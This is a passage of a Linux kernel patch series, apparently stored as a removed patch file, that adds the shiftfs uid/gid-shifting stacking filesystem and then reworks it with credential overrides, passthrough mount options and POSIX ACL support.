-+	err = vfs_setxattr(real, name, value, size, flags);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_xattr_get(const struct xattr_handler *handler,
-+			     struct dentry *dentry, struct inode *inode,
-+			     const char *name, void *value, size_t size)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_getxattr(real, name, value, size);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
-+				 size_t size)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_listxattr(real, list, size);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_removexattr(struct dentry *dentry, const char *name)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_removexattr(real, name);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_xattr_set(const struct xattr_handler *handler,
-+			     struct dentry *dentry, struct inode *inode,
-+			     const char *name, const void *value, size_t size,
-+			     int flags)
-+{
-+	if (!value)
-+		return shiftfs_removexattr(dentry, name);
-+	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
-+}
-+
-+static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
-+{
-+	struct inode *reali;
-+
-+	if (!dentry)
-+		return;
-+
-+	reali = dentry->d_inode;
-+
-+	if (!reali->i_op->get_link)
-+		inode->i_opflags |= IOP_NOFOLLOW;
-+
-+	inode->i_mapping = reali->i_mapping;
-+	inode->i_private = dentry;
-+}
-+
-+static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
-+			       umode_t mode, const char *symlink,
-+			       struct dentry *hardlink, bool excl)
-+{
-+	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
-+	struct inode *reali = real->d_inode, *newi;
-+	const struct inode_operations *iop = reali->i_op;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+	bool op_ok = false;
-+
-+	if (hardlink) {
-+		op_ok = iop->link;
-+	} else {
-+		switch (mode & S_IFMT) {
-+		case S_IFDIR:
-+			op_ok = iop->mkdir;
-+			break;
-+		case S_IFREG:
-+			op_ok = iop->create;
-+			break;
-+		case S_IFLNK:
-+			op_ok = iop->symlink;
-+		}
-+	}
-+	if (!op_ok)
-+		return -EINVAL;
-+
-+
-+	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
-+	if (!newi)
-+		return -ENOMEM;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+
-+	inode_lock_nested(reali, I_MUTEX_PARENT);
-+
-+	err = -EINVAL;		/* shut gcc up about uninit var */
-+	if (hardlink) {
-+		struct dentry *realhardlink = hardlink->d_fsdata;
-+
-+		err = vfs_link(realhardlink, reali, new, NULL);
-+	} else {
-+		switch (mode & S_IFMT) {
-+		case S_IFDIR:
-+			err = vfs_mkdir(reali, new, mode);
-+			break;
-+		case S_IFREG:
-+			err = vfs_create(reali, new, mode, excl);
-+			break;
-+		case S_IFLNK:
-+			err = vfs_symlink(reali, new, symlink);
-+		}
-+	}
-+
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	if (err)
-+		goto out_dput;
-+
-+	shiftfs_fill_inode(newi, new);
-+
-+	d_instantiate(dentry, newi);
-+
-+	new = NULL;
-+	newi = NULL;
-+
-+ out_dput:
-+	dput(new);
-+	iput(newi);
-+	inode_unlock(reali);
-+
-+	return err;
-+}
-+
-+static int shiftfs_create(struct inode *dir, struct dentry *dentry,
-+			  umode_t mode,  bool excl)
-+{
-+	mode |= S_IFREG;
-+
-+	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
-+}
-+
-+static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
-+			 umode_t mode)
-+{
-+	mode |= S_IFDIR;
-+
-+	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
-+}
-+
-+static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
-+			struct dentry *dentry)
-+{
-+	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
-+}
-+
-+static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
-+			   const char *symlink)
-+{
-+	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
-+}
-+
-+static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
-+{
-+	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
-+	struct inode *reali = real->d_inode;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	inode_lock_nested(reali, I_MUTEX_PARENT);
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+
-+	if (rmdir)
-+		err = vfs_rmdir(reali, new);
-+	else
-+		err = vfs_unlink(reali, new, NULL);
-+
-+	shiftfs_old_creds(oldcred, &newcred);
-+	inode_unlock(reali);
-+
-+	return err;
-+}
-+
-+static int shiftfs_unlink(struct inode *dir, struct dentry *dentry)
-+{
-+	return shiftfs_rm(dir, dentry, false);
-+}
-+
-+static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
-+{
-+	return shiftfs_rm(dir, dentry, true);
-+}
-+
-+static int shiftfs_rename(struct inode *olddir, struct dentry *old,
-+			  struct inode *newdir, struct dentry *new,
-+			  unsigned int flags)
-+{
-+	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
-+		*realold = old->d_fsdata,
-+		*realnew = new->d_fsdata, *trap;
-+	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
-+	int err = -EINVAL;
-+	const struct cred *oldcred, *newcred;
-+
-+	trap = lock_rename(rndd, rodd);
-+
-+	if (trap == realold || trap == realnew)
-+		goto out_unlock;
-+
-+	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
-+
-+	err = vfs_rename(realolddir, realold, realnewdir,
-+			 realnew, NULL, flags);
-+
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+ out_unlock:
-+	unlock_rename(rndd, rodd);
-+
-+	return err;
-+}
-+
-+static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
-+				     unsigned int flags)
-+{
-+	struct dentry *real = dir->i_private, *new;
-+	struct inode *reali = real->d_inode, *newi;
-+	const struct cred *oldcred, *newcred;
-+
-+	inode_lock(reali);
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
-+	shiftfs_old_creds(oldcred, &newcred);
-+	inode_unlock(reali);
-+
-+	if (IS_ERR(new))
-+		return new;
-+
-+	dentry->d_fsdata = new;
-+
-+	newi = NULL;
-+	if (!new->d_inode)
-+		goto out;
-+
-+	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
-+	if (!newi) {
-+		dput(new);
-+		return ERR_PTR(-ENOMEM);
-+	}
-+
-+ out:
-+	return d_splice_alias(newi, dentry);
-+}
-+
-+static int shiftfs_permission(struct inode *inode, int mask)
-+{
-+	struct dentry *real = inode->i_private;
-+	struct inode *reali = real->d_inode;
-+	const struct inode_operations *iop = reali->i_op;
-+	int err;
-+	const struct cred *oldcred, *newcred;
-+
-+	if (mask & MAY_NOT_BLOCK)
-+		return -ECHILD;
-+
-+	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
-+	if (iop->permission)
-+		err = iop->permission(reali, mask);
-+	else
-+		err = generic_permission(reali, mask);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	struct inode *reali = real->d_inode;
-+	const struct inode_operations *iop = reali->i_op;
-+	struct iattr newattr = *attr;
-+	const struct cred *oldcred, *newcred;
-+	struct super_block *sb = dentry->d_sb;
-+	int err;
-+
-+	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
-+	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	inode_lock(reali);
-+	if (iop->setattr)
-+		err = iop->setattr(real, &newattr);
-+	else
-+		err = simple_setattr(real, &newattr);
-+	inode_unlock(reali);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	if (err)
-+		return err;
-+
-+	/* all OK, reflect the change on our inode */
-+	setattr_copy(d_inode(dentry), attr);
-+	return 0;
-+}
-+
-+static int shiftfs_getattr(const struct path *path, struct kstat *stat,
-+			   u32 request_mask, unsigned int query_flags)
-+{
-+	struct inode *inode = path->dentry->d_inode;
-+	struct dentry *real = path->dentry->d_fsdata;
-+	struct inode *reali = real->d_inode;
-+	const struct inode_operations *iop = reali->i_op;
-+	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
-+	int err = 0;
-+
-+	if (iop->getattr)
-+		err = iop->getattr(&newpath, stat, request_mask, query_flags);
-+	else
-+		generic_fillattr(reali, stat);
-+
-+	if (err)
-+		return err;
-+
-+	/* transform the underlying id */
-+	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
-+	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
-+	return 0;
-+}
-+
-+static const struct inode_operations shiftfs_inode_ops = {
-+	.lookup		= shiftfs_lookup,
-+	.getattr	= shiftfs_getattr,
-+	.setattr	= shiftfs_setattr,
-+	.permission	= shiftfs_permission,
-+	.mkdir		= shiftfs_mkdir,
-+	.symlink	= shiftfs_symlink,
-+	.get_link	= shiftfs_get_link,
-+	.readlink	= shiftfs_readlink,
-+	.unlink		= shiftfs_unlink,
-+	.rmdir		= shiftfs_rmdir,
-+	.rename		= shiftfs_rename,
-+	.link		= shiftfs_link,
-+	.create		= shiftfs_create,
-+	.mknod		= NULL,	/* no special files currently */
-+	.listxattr	= shiftfs_listxattr,
-+};
-+
-+static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
-+				       struct dentry *dentry)
-+{
-+	struct inode *inode;
-+
-+	inode = new_inode(sb);
-+	if (!inode)
-+		return NULL;
-+
-+	/*
-+	 * our inode is completely vestigial.  All lookups, getattr
-+	 * and permission checks are done on the underlying inode, so
-+	 * what the user sees is entirely from the underlying inode.
-+	 */
-+	mode &= S_IFMT;
-+
-+	inode->i_ino = get_next_ino();
-+	inode->i_mode = mode;
-+	inode->i_flags |= S_NOATIME | S_NOCMTIME;
-+
-+	inode->i_op = &shiftfs_inode_ops;
-+
-+	shiftfs_fill_inode(inode, dentry);
-+
-+	return inode;
-+}
-+
-+static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+
-+	if (ssi->mark)
-+		seq_show_option(m, "mark", NULL);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct dentry *root = sb->s_root;
-+	struct dentry *realroot = root->d_fsdata;
-+	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
-+	int err;
-+
-+	err = vfs_statfs(&realpath, buf);
-+	if (err)
-+		return err;
-+
-+	buf->f_type = sb->s_magic;
-+
-+	return 0;
-+}
-+
-+static void shiftfs_put_super(struct super_block *sb)
-+{
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+
-+	mntput(ssi->mnt);
-+	put_user_ns(ssi->userns);
-+	kfree(ssi);
-+}
-+
-+static const struct xattr_handler shiftfs_xattr_handler = {
-+	.prefix = "",
-+	.get    = shiftfs_xattr_get,
-+	.set    = shiftfs_xattr_set,
-+};
-+
-+const struct xattr_handler *shiftfs_xattr_handlers[] = {
-+	&shiftfs_xattr_handler,
-+	NULL
-+};
-+
-+static const struct super_operations shiftfs_super_ops = {
-+	.put_super	= shiftfs_put_super,
-+	.show_options	= shiftfs_show_options,
-+	.statfs		= shiftfs_statfs,
-+};
-+
-+struct shiftfs_data {
-+	void *data;
-+	const char *path;
-+};
-+
-+static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
-+			      int silent)
-+{
-+	struct shiftfs_data *data = raw_data;
-+	char *name = kstrdup(data->path, GFP_KERNEL);
-+	int err = -ENOMEM;
-+	struct shiftfs_super_info *ssi = NULL;
-+	struct path path;
-+	struct dentry *dentry;
-+
-+	if (!name)
-+		goto out;
-+
-+	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
-+	if (!ssi)
-+		goto out;
-+
-+	err = -EPERM;
-+	err = shiftfs_parse_options(ssi, data->data);
-+	if (err)
-+		goto out;
-+
-+	/* to mark a mount point, must be real root */
-+	if (ssi->mark && !capable(CAP_SYS_ADMIN))
-+		goto out;
-+
-+	/* else to mount a mark, must be userns admin */
-+	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
-+		goto out;
-+
-+	err = kern_path(name, LOOKUP_FOLLOW, &path);
-+	if (err)
-+		goto out;
-+
-+	err = -EPERM;
-+
-+	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
-+		err = -ENOTDIR;
-+		goto out_put;
-+	}
-+
-+	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
-+	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
-+		err = -EINVAL;
-+		goto out_put;
-+	}
-+
-+	if (ssi->mark) {
-+		/*
-+		 * this part is visible unshifted, so make sure no
-+		 * executables that could be used to give suid
-+		 * privileges
-+		 */
-+		sb->s_iflags = SB_I_NOEXEC;
-+		ssi->mnt = path.mnt;
-+		dentry = path.dentry;
-+	} else {
-+		struct shiftfs_super_info *mp_ssi;
-+
-+		/*
-+		 * this leg executes if we're admin capable in
-+		 * the namespace, so be very careful
-+		 */
-+		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
-+			goto out_put;
-+		mp_ssi = path.dentry->d_sb->s_fs_info;
-+		if (!mp_ssi->mark)
-+			goto out_put;
-+		ssi->mnt = mntget(mp_ssi->mnt);
-+		dentry = dget(path.dentry->d_fsdata);
-+		path_put(&path);
-+	}
-+	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
-+	sb->s_fs_info = ssi;
-+	sb->s_magic = SHIFTFS_MAGIC;
-+	sb->s_op = &shiftfs_super_ops;
-+	sb->s_xattr = shiftfs_xattr_handlers;
-+	sb->s_d_op = &shiftfs_dentry_ops;
-+	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
-+	sb->s_root->d_fsdata = dentry;
-+
-+	return 0;
-+
-+ out_put:
-+	path_put(&path);
-+ out:
-+	kfree(name);
-+	kfree(ssi);
-+	return err;
-+}
-+
-+static struct dentry *shiftfs_mount(struct file_system_type *fs_type,
-+				    int flags, const char *dev_name, void *data)
-+{
-+	struct shiftfs_data d = { data, dev_name };
-+
-+	return mount_nodev(fs_type, flags, &d, shiftfs_fill_super);
-+}
-+
-+static struct file_system_type shiftfs_type = {
-+	.owner		= THIS_MODULE,
-+	.name		= "shiftfs",
-+	.mount		= shiftfs_mount,
-+	.kill_sb	= kill_anon_super,
-+	.fs_flags	= FS_USERNS_MOUNT,
-+};
-+
-+static int __init shiftfs_init(void)
-+{
-+	return register_filesystem(&shiftfs_type);
-+}
-+
-+static void __exit shiftfs_exit(void)
-+{
-+	unregister_filesystem(&shiftfs_type);
-+}
-+
-+MODULE_ALIAS_FS("shiftfs");
-+MODULE_AUTHOR("James Bottomley");
-+MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
-+MODULE_LICENSE("GPL v2");
-+module_init(shiftfs_init)
-+module_exit(shiftfs_exit)
-diff --git a/include/uapi/linux/magic.h b/include/uapi/linux/magic.h
-index 6325d1d0e90f..1f70efb41565 100644
---- a/include/uapi/linux/magic.h
-+++ b/include/uapi/linux/magic.h
-@@ -102,4 +102,6 @@
- #define DEVMEM_MAGIC		0x454d444d	/* "DMEM" */
- #define SECRETMEM_MAGIC		0x5345434d	/* "SECM" */
- 
-+#define SHIFTFS_MAGIC		0x6a656a62
-+
- #endif /* __LINUX_MAGIC_H__ */
--- 
-2.39.2
-
-From 7b502b7e97db8ec9deff14f434eed2f2fbc0cd2f Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Thu, 4 Apr 2019 15:39:12 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework and extend
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1823186
-
-/* Introduction */
-The shiftfs filesystem is implemented as a stacking filesystem. Since it is
-a stacking filesystem it shares concepts with overlayfs and ecryptfs.
-Usually, shiftfs will be stacked upon another filesystem. The filesystem on
-top - shiftfs - is referred to as "upper filesystem" or "overlay" and the
-filesystem it is stacked upon is referred to as "lower filesystem" or
-"underlay".
-
-/* Marked and Unmarked shiftfs mounts */
-To use shiftfs it is necessary that a given mount is marked as shiftable via
-the "mark" mount option. Any mount of shiftfs without the "mark" mount option
-not on top of a shiftfs mount with the "mark" mount option will be refused with
-EPERM.
-After a marked shiftfs mount has been performed other shiftfs mounts
-referencing the marked shiftfs mount can be created. These secondary shiftfs
-mounts are usually what are of interest.
-The marked shiftfs mount will take a reference to the underlying mountpoint of
-the directory it is marking as shiftable. Any unmarked shiftfts mounts
-referencing this marked shifts mount will take a second reference to this
-directory as well. This ensures that the underlying marked shiftfs mount can be
-unmounted thereby dropping the reference to the underlying directory without
-invalidating the mountpoint of said directory since the non-marked shiftfs
-mount still holds another reference to it.
-
-/* Stacking Depth */
-Shiftfs tries to keep the stack as flat as possible to avoid hitting the
-kernel enforced filesystem stacking limit.
-
-/* Permission Model */
-When the mark shiftfs mount is created shiftfs will record the credentials of
-the creator of the super block and stash it in the super block. When other
-non-mark shiftfs mounts are created that reference the mark shiftfs mount they
-will stash another reference to the creators credentials. Before calling into
-the underlying filesystem shiftfs will switch to the creators credentials and
-revert to the original credentials after the underlying filesystem operation
-returns.
-
-/* Mount Options */
-- mark
-  When set the mark mount option indicates that the mount in question is
-  allowed to be shifted. Since shiftfs it mountable in by user namespace root
-  non-initial user namespace this mount options ensures that the system
-  administrator has decided that the marked mount is safe to be shifted.
-  To mark a mount as shiftable CAP_SYS_ADMIN in the user namespace is required.
-- passthrough={0,1,2,3}
-  This mount options functions as a bitmask. When set to a non-zero value
-  shiftfs will try to act as an invisible shim sitting on top of the
-  underlying filesystem.
-  - 1: Shifts will report the filesystem type of the underlay for stat-like
-       system calls.
-  - 2: Shiftfs will passthrough whitelisted ioctl() to the underlay.
-  - 3: Shiftfs will both use 1 and 2.
-Note that mount options on a marked mount cannot be changed.
-
-/* Extended Attributes */
-Shiftfs will make sure to translate extended attributes.
-
-/* Inodes Numbers */
-Shiftfs inodes numbers are copied up from the underlying filesystem, i.e.
-shiftfs inode numbers will be identical to the corresponding underlying
-filesystem's inode numbers. This has the advantage that inotify and friends
-should work out of the box.
-(In essence, shiftfs is nothing but a 1:1 mirror of the underlying filesystem's
- dentries and inodes.)
-
-/* Device Support */
-Shiftfs only supports the creation of pipe and socket devices. Character and
-block devices cannot be created through shiftfs.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/Kconfig   |   10 +
- fs/shiftfs.c | 1852 ++++++++++++++++++++++++++++++++++++++++----------
- 2 files changed, 1493 insertions(+), 369 deletions(-)
-
-diff --git a/fs/Kconfig b/fs/Kconfig
-index b53bece1e940..ada9a1234e72 100644
---- a/fs/Kconfig
-+++ b/fs/Kconfig
-@@ -136,6 +136,16 @@ config SHIFT_FS
- 	  unprivileged containers can use this to mount root volumes
- 	  using this technique.
- 
-+config SHIFT_FS_POSIX_ACL
-+	bool "shiftfs POSIX Access Control Lists"
-+	depends on SHIFT_FS
-+	select FS_POSIX_ACL
-+	help
-+	  POSIX Access Control Lists (ACLs) support permissions for users and
-+	  groups beyond the owner/group/world scheme.
-+
-+	  If you don't know what Access Control Lists are, say N.
-+
- menu "Caches"
- 
- source "fs/netfs/Kconfig"
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index f7cada126daa..ad1ae5bce6c1 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1,3 +1,4 @@
-+#include <linux/capability.h>
- #include <linux/cred.h>
- #include <linux/mount.h>
- #include <linux/file.h>
-@@ -7,83 +8,179 @@
- #include <linux/kernel.h>
- #include <linux/magic.h>
- #include <linux/parser.h>
-+#include <linux/security.h>
- #include <linux/seq_file.h>
- #include <linux/statfs.h>
- #include <linux/slab.h>
- #include <linux/user_namespace.h>
- #include <linux/uidgid.h>
- #include <linux/xattr.h>
-+#include <linux/posix_acl.h>
-+#include <linux/posix_acl_xattr.h>
-+#include <linux/uio.h>
- 
- struct shiftfs_super_info {
- 	struct vfsmount *mnt;
- 	struct user_namespace *userns;
-+	/* creds of process who created the super block */
-+	const struct cred *creator_cred;
- 	bool mark;
-+	unsigned int passthrough;
-+	struct shiftfs_super_info *info_mark;
- };
- 
--static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
--				       struct dentry *dentry);
-+struct shiftfs_file_info {
-+	struct path realpath;
-+	struct file *realfile;
-+};
-+
-+struct kmem_cache *shiftfs_file_info_cache;
-+
-+static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
-+			       umode_t mode, dev_t dev, struct dentry *dentry);
-+
-+#define SHIFTFS_PASSTHROUGH_NONE 0
-+#define SHIFTFS_PASSTHROUGH_STAT 1
-+#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
-+
-+static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
-+{
-+	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
-+		return false;
-+
-+	if (info->info_mark &&
-+	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
-+		return false;
-+
-+	return true;
-+}
- 
- enum {
- 	OPT_MARK,
-+	OPT_PASSTHROUGH,
- 	OPT_LAST,
- };
- 
- /* global filesystem options */
- static const match_table_t tokens = {
- 	{ OPT_MARK, "mark" },
-+	{ OPT_PASSTHROUGH, "passthrough=%u" },
- 	{ OPT_LAST, NULL }
- };
- 
--static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
-+static const struct cred *shiftfs_override_creds(const struct super_block *sb)
- {
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
--	struct cred *cred = prepare_creds();
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 
--	if (!cred)
--		return NULL;
-+	return override_creds(sbinfo->creator_cred);
-+}
-+
-+static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
-+					       struct cred *newcred)
-+{
-+	revert_creds(oldcred);
-+	put_cred(newcred);
-+}
-+
-+static int shiftfs_override_object_creds(const struct super_block *sb,
-+					 const struct cred **oldcred,
-+					 struct cred **newcred,
-+					 struct dentry *dentry, umode_t mode,
-+					 bool hardlink)
-+{
-+	kuid_t fsuid = current_fsuid();
-+	kgid_t fsgid = current_fsgid();
-+
-+	*oldcred = shiftfs_override_creds(sb);
-+
-+	*newcred = prepare_creds();
-+	if (!*newcred) {
-+		revert_creds(*oldcred);
-+		return -ENOMEM;
-+	}
-+
-+	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
-+	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+
-+	if (!hardlink) {
-+		int err = security_dentry_create_files_as(dentry, mode,
-+							  &dentry->d_name,
-+							  *oldcred, *newcred);
-+		if (err) {
-+			shiftfs_revert_object_creds(*oldcred, *newcred);
-+			return err;
-+		}
-+	}
- 
--	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
--	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
--	put_user_ns(cred->user_ns);
--	cred->user_ns = get_user_ns(ssi->userns);
-+	put_cred(override_creds(*newcred));
-+	return 0;
-+}
- 
--	return cred;
-+static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
-+			 kuid_t kuid)
-+{
-+	uid_t uid = from_kuid(from, kuid);
-+	return make_kuid(to, uid);
- }
- 
--static const struct cred *shiftfs_new_creds(const struct cred **newcred,
--					    struct super_block *sb)
-+static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
-+			 kgid_t kgid)
- {
--	const struct cred *cred = shiftfs_get_up_creds(sb);
-+	gid_t gid = from_kgid(from, kgid);
-+	return make_kgid(to, gid);
-+}
- 
--	*newcred = cred;
-+static void shiftfs_copyattr(struct inode *from, struct inode *to)
-+{
-+	struct user_namespace *from_ns = from->i_sb->s_user_ns;
-+	struct user_namespace *to_ns = to->i_sb->s_user_ns;
-+
-+	to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid);
-+	to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid);
-+	to->i_mode = from->i_mode;
-+	to->i_atime = from->i_atime;
-+	to->i_mtime = from->i_mtime;
-+	to->i_ctime = from->i_ctime;
-+	i_size_write(to, i_size_read(from));
-+}
- 
--	if (cred)
--		cred = override_creds(cred);
--	else
--		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
-+static void shiftfs_copyflags(struct inode *from, struct inode *to)
-+{
-+	unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME;
- 
--	return cred;
-+	inode_set_flags(to, from->i_flags & mask, mask);
- }
- 
--static void shiftfs_old_creds(const struct cred *oldcred,
--			      const struct cred **newcred)
-+static void shiftfs_file_accessed(struct file *file)
- {
--	if (!*newcred)
-+	struct inode *upperi, *loweri;
-+
-+	if (file->f_flags & O_NOATIME)
- 		return;
- 
--	revert_creds(oldcred);
--	put_cred(*newcred);
-+	upperi = file_inode(file);
-+	loweri = upperi->i_private;
-+
-+	if (!loweri)
-+		return;
-+
-+	upperi->i_mtime = loweri->i_mtime;
-+	upperi->i_ctime = loweri->i_ctime;
-+
-+	touch_atime(&file->f_path);
- }
- 
--static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
-+static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo,
-+				       char *options)
- {
- 	char *p;
- 	substring_t args[MAX_OPT_ARGS];
- 
--	ssi->mark = false;
-+	sbinfo->mark = false;
-+	sbinfo->passthrough = 0;
- 
- 	while ((p = strsep(&options, ",")) != NULL) {
--		int token;
-+		int err, intarg, token;
- 
- 		if (!*p)
- 			continue;
-@@ -91,121 +188,140 @@ static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
- 		token = match_token(p, tokens, args);
- 		switch (token) {
- 		case OPT_MARK:
--			ssi->mark = true;
-+			sbinfo->mark = true;
-+			break;
-+		case OPT_PASSTHROUGH:
-+			err = match_int(&args[0], &intarg);
-+			if (err)
-+				return err;
-+
-+			if (intarg & ~SHIFTFS_PASSTHROUGH_ALL)
-+				return -EINVAL;
-+
-+			sbinfo->passthrough = intarg;
- 			break;
- 		default:
- 			return -EINVAL;
- 		}
- 	}
-+
- 	return 0;
- }
- 
- static void shiftfs_d_release(struct dentry *dentry)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 
--	dput(real);
-+	if (lowerd)
-+		dput(lowerd);
- }
- 
- static struct dentry *shiftfs_d_real(struct dentry *dentry,
- 				     const struct inode *inode)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+
-+	if (inode && d_inode(dentry) == inode)
-+		return dentry;
- 
--	if (unlikely(real->d_flags & DCACHE_OP_REAL))
--		return real->d_op->d_real(real, real->d_inode);
-+	lowerd = d_real(lowerd, inode);
-+	if (lowerd && (!inode || inode == d_inode(lowerd)))
-+		return lowerd;
- 
--	return real;
-+	WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry,
-+	     inode ? inode->i_sb->s_id : "NULL", inode ? inode->i_ino : 0);
-+	return dentry;
- }
- 
- static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	int err = 1;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 
--	if (d_unhashed(real))
-+	if (d_is_negative(lowerd) != d_is_negative(dentry))
- 		return 0;
- 
--	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
--		return 1;
-+	if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE))
-+		err = lowerd->d_op->d_weak_revalidate(lowerd, flags);
- 
--	return real->d_op->d_weak_revalidate(real, flags);
-+	if (d_really_is_positive(dentry)) {
-+		struct inode *inode = d_inode(dentry);
-+		struct inode *loweri = d_inode(lowerd);
-+
-+		shiftfs_copyattr(loweri, inode);
-+		if (!inode->i_nlink)
-+			err = 0;
